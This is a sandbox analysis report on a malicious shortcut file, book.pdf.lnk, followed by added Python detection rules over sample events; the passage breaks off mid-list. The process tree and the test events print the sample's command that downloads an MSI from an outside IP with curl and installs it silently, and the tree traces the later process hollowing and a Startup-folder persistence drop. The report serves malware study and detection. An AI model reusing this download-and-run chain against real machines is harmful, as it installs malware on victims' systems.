Resubmissions
Submitted          Task ID             Score
24-08-2023 17:35   230824-v568qafh4y   3
23-08-2023 19:18   230823-xz2gdsfa82   3
23-08-2023 19:16   230823-xy925sfa76   3
21-08-2023 09:54   230821-lw62xscb47   10
21-08-2023 00:59   230821-bb4qysaa78   10

Analysis
- max time kernel: 149s
- max time network: 154s
- platform: windows10-2004_x64
- resource: win10v2004-20230703-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20230703-en locale:en-us os:windows10-2004-x64 system
- submitted: 21-08-2023 00:59
Static task: static1
Behavioral task: behavioral1
  Sample: book.pdf.lnk
  Resource: win7-20230712-en
Behavioral task: behavioral2
  Sample: book.pdf.lnk
  Resource: win10v2004-20230703-en
General
- Target: book.pdf.lnk
- Size: 1KB
- MD5: 0185e0fc2f505312001e1a65e6783908
- SHA1: 8e4cf0397ba32d233a515a5aca02751f6f9344c6
- SHA256: 8b3162141ac545fa0ae63777748973b8ee88bb8234a917d5fb3238d2c2ca963d
- SHA512: 1a484bb08401fd7476d37029fa753aa82af10aa702f30fa30568ff7eaf94b484e604bbff9f6b5a67179a7d708cf61bb767fa974e0a9f35e751d74d9a2dd4fefc
Malware Config
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess 53 IoCs
Processes: Autoit3.exe, cmd.exe
description | pid | process | target process (entries listed in report order, grouped by creating process)
Autoit3.exe (PID 4800) created: 5032 msiexec.exe, 2672 svchost.exe, 3396 Conhost.exe, 3516 DllHost.exe, 3724 RuntimeBroker.exe, 3396 Conhost.exe, 2632 sihost.exe, 3612 StartMenuExperienceHost.exe, 2672 svchost.exe, 64 AcroRd32.exe, 3612 StartMenuExperienceHost.exe, 2672 svchost.exe, 2672 svchost.exe, 1176 TextInputHost.exe, 3848 SearchApp.exe, 2672 svchost.exe
cmd.exe (PID 5520) created: 3848 SearchApp.exe, 1632 Eula.exe, 1632 Eula.exe, 1632 Eula.exe, 2632 sihost.exe, 1632 Eula.exe, 3848 SearchApp.exe, 2632 sihost.exe, 64 AcroRd32.exe, 3848 SearchApp.exe, 1176 TextInputHost.exe, 4544 RdrCEF.exe, 2596 32BitMAPIBroker.exe, 2672 svchost.exe, 2672 svchost.exe, 2596 32BitMAPIBroker.exe, 64 AcroRd32.exe, 2812 taskhostw.exe, 4544 RdrCEF.exe, 2596 32BitMAPIBroker.exe, 2632 sihost.exe, 1176 TextInputHost.exe, 3848 SearchApp.exe, 3612 StartMenuExperienceHost.exe, 1632 Eula.exe, 64 AcroRd32.exe, 4544 RdrCEF.exe, 3612 StartMenuExperienceHost.exe, 2812 taskhostw.exe, 2596 32BitMAPIBroker.exe, 2812 taskhostw.exe, 2672 svchost.exe, 2812 taskhostw.exe, 2632 sihost.exe, 2596 32BitMAPIBroker.exe, 3612 StartMenuExperienceHost.exe, 2672 svchost.exe
- Blocklisted process makes network request 31 IoCs
Processes: cmd.exe
flow | pid | process
cmd.exe (PID 5520), flows: 20, 21, 22, 40, 41, 42, 43, 44, 45, 46, 47, 50, 51, 52, 53, 54, 57, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 72, 76, 77
- Drops startup file 1 IoCs
Processes: cmd.exe
description | ioc | process
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aaakdee.lnk (cmd.exe)
- Executes dropped EXE 1 IoCs
Processes: Autoit3.exe
pid | process: 4800 Autoit3.exe
- Loads dropped DLL 2 IoCs
Processes: MsiExec.exe
pid | process: 3248 MsiExec.exe (two entries)
- Modifies file permissions 1 TTPs 2 IoCs
Processes: ICACLS.EXE, ICACLS.EXE
pid | process: 4280 ICACLS.EXE; 5568 ICACLS.EXE
- Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: msiexec.exe
description | ioc | process
File opened (read-only) by msiexec.exe, in report order: \??\P:, \??\R:, \??\V:, \??\W:, \??\Y:, \??\N:, \??\B:, \??\E:, \??\G:, \??\J:, \??\U:, \??\Z:, \??\A:, \??\I:, \??\L:, \??\O:, \??\Q:, \??\S:, \??\T:, \??\X:, \??\H:, \??\M:, \??\K:
- Suspicious use of SetThreadContext 1 IoCs
Processes: Autoit3.exe
description | pid | process | target process
PID 4800 set thread context of 5520: Autoit3.exe (4800) -> cmd.exe (5520)
- Drops file in Windows directory 11 IoCs
Processes: msiexec.exe, EXPAND.EXE
description | ioc | process
File opened for modification: C:\Windows\Installer\ (msiexec.exe)
File opened for modification: C:\Windows\LOGS\DPX\setupact.log (EXPAND.EXE)
File opened for modification: C:\Windows\Installer\MSIF435.tmp (msiexec.exe)
File opened for modification: C:\Windows\Installer\e57aaf5.msi (msiexec.exe)
File opened for modification: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log (msiexec.exe)
File created: C:\Windows\Installer\SourceHash{2E7A2CE6-9953-4AB8-AF77-A6C7F8260AA4} (msiexec.exe)
File opened for modification: C:\Windows\LOGS\DPX\setuperr.log (EXPAND.EXE)
File opened for modification: C:\Windows\Installer\MSIF425.tmp (msiexec.exe)
File created: C:\Windows\Installer\e57aaf5.msi (msiexec.exe)
File created: C:\Windows\Installer\inprogressinstallinfo.ipi (msiexec.exe)
File opened for modification: C:\Windows\Installer\MSIAF5A.tmp (msiexec.exe)
- Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
- Modifies Internet Explorer settings 1 IoCs
(The heading of this signature was lost in extraction; it is the "Modifies Internet Explorer settings" signature attributed to AcroRd32.exe, PID 64, in the process tree below.)
Processes: AcroRd32.exe
description | ioc | process
Key created: \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (AcroRd32.exe)
- Modifies registry class 1 IoCs
Processes: Autoit3.exe
description | ioc | process
Key created: \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings (Autoit3.exe)
- Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: msiexec.exe, Autoit3.exe, cmd.exe
pid | process: 4304 msiexec.exe (two entries), then repeated entries for 4800 Autoit3.exe followed by repeated entries for 5520 cmd.exe (62 entries between them)
- Suspicious use of AdjustPrivilegeToken 40 IoCs
Processes: msiexec.exe, msiexec.exe
description | pid | process (tokens listed in report order, grouped by process)
msiexec.exe (PID 5032), 31 entries: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
msiexec.exe (PID 4304), 9 entries: SeSecurityPrivilege (logged between the first two PID 5032 entries), then SeRestorePrivilege and SeTakeOwnershipPrivilege alternating, four times each
- Suspicious use of FindShellTrayWindow 1 IoCs
Processes: AcroRd32.exe
pid | process: 64 AcroRd32.exe
- Suspicious use of SetWindowsHookEx 6 IoCs
Processes: AcroRd32.exe
pid | process: 64 AcroRd32.exe (six entries)
- Suspicious use of WriteProcessMemory 64 IoCs
Processes: cmd.exe, cmd.exe, msiexec.exe, MsiExec.exe, Autoit3.exe
description | pid | process | target process (identical consecutive entries collapsed with a count)
PID 2568 wrote to memory of 4640: cmd.exe -> cmd.exe (x2)
PID 4640 wrote to memory of 4196: cmd.exe -> curl.exe (x2)
PID 4640 wrote to memory of 5032: cmd.exe -> msiexec.exe (x2)
PID 4304 wrote to memory of 3248: msiexec.exe -> MsiExec.exe (x3)
PID 3248 wrote to memory of 4280: MsiExec.exe -> ICACLS.EXE (x3)
PID 3248 wrote to memory of 1752: MsiExec.exe -> EXPAND.EXE (x3)
PID 3248 wrote to memory of 4800: MsiExec.exe -> Autoit3.exe (x3)
PID 4800 wrote to memory of 64: Autoit3.exe -> AcroRd32.exe (x3)
PID 4800 wrote to memory of 1632: Autoit3.exe -> Eula.exe (the remaining 43 of the 64 listed entries)
Processes
Parent/child relationships are shown by indentation. Each entry gives the PID, the image path, the full command line, and the signatures that process triggered.

- PID 2672  C:\Windows\system32\svchost.exe
    command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
  - PID 1632  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
      command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe"
  - PID 2596  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
      command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe"
  - PID 5280  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
      command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe"
- PID 3516  C:\Windows\system32\DllHost.exe
    command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- PID 3724  C:\Windows\System32\RuntimeBroker.exe
    command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- PID 3612  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    command line: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
- PID 1176  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
    command line: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
- PID 3848  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    command line: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
- PID 2812  C:\Windows\system32\taskhostw.exe
    command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
- PID 2632  C:\Windows\system32\sihost.exe
    command line: sihost.exe
- PID 2568  C:\Windows\system32\cmd.exe
    command line: cmd /c C:\Users\Admin\AppData\Local\Temp\book.pdf.lnk
    signatures: Suspicious use of WriteProcessMemory
  - PID 3396  C:\Windows\System32\Conhost.exe
      command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - PID 4640  C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c echo %cd% > C:\Users\Admin\AppData\Local\Temp\ruta.txt & echo eGz & echo zv & echo GMp & echo RC & curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu & msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn
      signatures: Suspicious use of WriteProcessMemory
    - PID 4196  C:\Windows\system32\curl.exe
        command line: curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu
    - PID 5032  C:\Windows\system32\msiexec.exe
        command line: msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn
        signatures: Suspicious use of AdjustPrivilegeToken
- PID 4304  C:\Windows\system32\msiexec.exe
    command line: C:\Windows\system32\msiexec.exe /V
    signatures: Enumerates connected drives; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - PID 3248  C:\Windows\syswow64\MsiExec.exe
      command line: C:\Windows\syswow64\MsiExec.exe -Embedding 3D1F5AF493D17AD18133CC9875D315A0
      signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
    - PID 4280  C:\Windows\SysWOW64\ICACLS.EXE
        command line: "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-75ffe91d-3557-4b15-8419-19551a5c5c68\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        signatures: Modifies file permissions
    - PID 1752  C:\Windows\SysWOW64\EXPAND.EXE
        command line: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        signatures: Drops file in Windows directory
    - PID 4800  C:\Users\Admin\AppData\Local\Temp\MW-75ffe91d-3557-4b15-8419-19551a5c5c68\files\Autoit3.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\MW-75ffe91d-3557-4b15-8419-19551a5c5c68\files\Autoit3.exe" bybq
        signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious use of SetThreadContext; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
      - PID 64  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\book.pdf"
          signatures: Modifies Internet Explorer settings; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx
        - PID 4544  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
          - PID 208  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=EE8014EC8F06AAB485009F15A014CE80 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=EE8014EC8F06AAB485009F15A014CE80 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
          - PID 1696  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E37CD281A5F3407371DD3932614650F0 --mojo-platform-channel-handle=1812 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          - PID 4352  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E88A341BF0729EC038B7117FF54092A8 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E88A341BF0729EC038B7117FF54092A8 --renderer-client-id=4 --mojo-platform-channel-handle=2328 --allow-no-sandbox-job /prefetch:1
          - PID 3216  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EF2C2437D54B4A0B5A83F86BD491C2E4 --mojo-platform-channel-handle=2360 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          - PID 4068  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2E3429807C66371C92C3B5483BDDBCB0 --mojo-platform-channel-handle=2812 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          - PID 2580  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E0E465A87F210E3FB5AAE92F6B5DFD5F --mojo-platform-channel-handle=2496 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      - PID 5504  C:\Windows\SysWOW64\cmd.exe
          command line: cmd.exe
      - PID 5512  C:\Windows\SysWOW64\cmd.exe
          command line: cmd.exe
      - PID 5520  C:\Windows\SysWOW64\cmd.exe
          command line: cmd.exe
          signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Blocklisted process makes network request; Drops startup file; Suspicious behavior: EnumeratesProcesses
    - PID 5568  C:\Windows\SysWOW64\ICACLS.EXE
        command line: "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-75ffe91d-3557-4b15-8419-19551a5c5c68\." /SETINTEGRITYLEVEL (CI)(OI)LOW
        signatures: Modifies file permissions
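The tree above is worth reading as a sequence of detection opportunities rather than as one payload: cmd.exe is handed a .lnk out of the user's Temp, a single command line fetches an .msi with curl -o and hands the same path to msiexec /i /quiet /qn, the MsiExec.exe -Embedding custom-action host launches Autoit3.exe out of a MW-* folder in Temp, that binary starts a bare cmd.exe and sets its thread context (the hollowed PID 5520), and the hollowed shell then writes aaakdee.lnk into the Startup folder and makes network requests. The following Python is an added example, not part of the sandbox report, that encodes those checks as rules over constructed Sysmon-style events mirroring this tree; the event field names, the explorer.exe parent of PID 2568, the control PIDs 7000/7001 and the 203.0.113.10:443 destination are assumptions (the report's Network section is not reproduced here). It does not attempt the NtCreateUserProcessOtherParentProcess or SetThreadContext signatures, which need kernel-level telemetry rather than process-creation records.

```python
"""Detection rules for the LNK -> curl -> msiexec -> Autoit3 -> hollowed cmd.exe chain.
Added example; field names are an assumption modelled on Sysmon ProcessCreate,
FileCreate and NetworkConnect events."""
from dataclasses import dataclass
from typing import List, Optional, Tuple
import ntpath
import re


@dataclass(frozen=True)
class Event:
    kind: str                        # "process" | "file" | "network"
    pid: int                         # acting process
    image: str                       # full path of the acting process
    cmdline: str = ""                # process events only
    parent_pid: Optional[int] = None
    parent_image: str = ""
    target: str = ""                 # created file path, or remote ip:port


USER_TEMP = r"c:\users\admin\appdata\local\temp"     # per-user Temp seen in the report
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _arg_after(cmdline: str, flag: str) -> Optional[str]:
    """Value following a flag, honouring double-quoted Windows paths."""
    m = re.search(re.escape(flag) + r'\s+("([^"]+)"|(\S+))', cmdline)
    return (m.group(2) or m.group(3)) if m else None


def detect(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every rule an event satisfies."""
    hits: List[Tuple[str, int]] = []
    for e in events:
        img, parent, cl = _base(e.image), _base(e.parent_image), e.cmdline.lower()
        if e.kind == "process":
            # 1. cmd.exe handed a .lnk that lives in the user's Temp (the sample itself)
            if img == "cmd.exe" and USER_TEMP in cl and re.search(r'\.lnk("|\s|$)', cl):
                hits.append(("lnk_via_cmd", e.pid))
            # 2. one command line: curl -o <path> ... msiexec /i <same path> with /quiet or /qn
            dl, msi = _arg_after(cl, "-o"), _arg_after(cl, "/i")
            quiet = re.search(r"/q(n|uiet)\b", cl) is not None
            if "curl" in cl and dl and msi and dl == msi and quiet:
                hits.append(("download_then_quiet_install", e.pid))
            # 3. msiexec itself installing a package that sits in the user's Temp, with no UI
            if img == "msiexec.exe" and msi and msi.startswith(USER_TEMP) and quiet:
                hits.append(("quiet_msi_from_temp", e.pid))
            # 4. the custom-action host (MsiExec.exe -Embedding) launching a binary from Temp
            if parent == "msiexec.exe" and e.image.lower().startswith(USER_TEMP):
                hits.append(("msi_custom_action_spawns_from_temp", e.pid))
            # 5. a binary in Temp starting a bare cmd.exe: the usual host for thread-context hollowing
            if img == "cmd.exe" and e.parent_image.lower().startswith(USER_TEMP) and len(cl.split()) == 1:
                hits.append(("hollow_host_cmd", e.pid))
        elif e.kind == "file":
            # 6. a .lnk written into the per-user Startup folder by anything other than explorer.exe
            t = e.target.lower()
            if STARTUP_DIR in t and t.endswith(".lnk") and img != "explorer.exe":
                hits.append(("startup_lnk_drop", e.pid))
        elif e.kind == "network" and img == "cmd.exe":
            # 7. cmd.exe opening a socket; here it does so only because it was hollowed
            hits.append(("cmd_network", e.pid))
    return hits


# Constructed events mirroring the report's tree. The explorer.exe parent (PID 1000), the
# control PIDs 7000/7001 and the 203.0.113.10:443 destination are assumptions.
MW = r"C:\Users\Admin\AppData\Local\Temp\MW-75ffe91d-3557-4b15-8419-19551a5c5c68\files"
SAMPLE_EVENTS = [
    Event("process", 2568, r"C:\Windows\system32\cmd.exe",
          r"cmd /c C:\Users\Admin\AppData\Local\Temp\book.pdf.lnk", 1000, r"C:\Windows\explorer.exe"),
    Event("process", 4640, r"C:\Windows\System32\cmd.exe",
          r'"C:\Windows\System32\cmd.exe" /c echo %cd% > C:\Users\Admin\AppData\Local\Temp\ruta.txt '
          r"& echo eGz & echo zv & echo GMp & echo RC "
          r"& curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu "
          r"& msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn",
          2568, r"C:\Windows\system32\cmd.exe"),
    Event("process", 4196, r"C:\Windows\system32\curl.exe",
          r"curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu",
          4640, r"C:\Windows\System32\cmd.exe"),
    Event("process", 5032, r"C:\Windows\system32\msiexec.exe",
          r"msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn", 4640, r"C:\Windows\System32\cmd.exe"),
    Event("process", 3248, r"C:\Windows\syswow64\MsiExec.exe",
          r"C:\Windows\syswow64\MsiExec.exe -Embedding 3D1F5AF493D17AD18133CC9875D315A0", 4304, r"C:\Windows\system32\msiexec.exe"),
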